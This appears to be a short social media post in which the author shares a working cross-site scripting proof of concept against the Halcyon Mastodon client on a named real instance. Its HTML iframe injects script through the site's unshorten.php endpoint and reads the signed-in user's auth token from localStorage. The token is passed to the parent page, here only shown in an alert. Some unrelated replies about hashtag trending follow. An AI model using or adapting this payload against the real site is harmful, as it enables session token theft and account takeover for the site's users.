remember that toot link thing from eariler?
i made an iframe version
for it to work you must be signed into halcyon.mstdn.social
this one doesn't post anything it just tells you your token

<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<script>
window.onmessage = ({ data }) => {
alert(`Your token is ${data}`)
}
</script>
<iframe title="xss"
src="https://halcyon.mstdn.social/unshorten.php?url=%3Cscript%3Etop.postMessage(localStorage.current_authtoken, '*')%3C/script%3E"
frameborder="0"></iframe>
</html>

@Jack Jack always keeps on winning huh?
@HuniArchiver i have a plan to get #gumba trending again
@HuniArchiver i might need to use #gumba2 as #gumba says 140 per week but it's not trending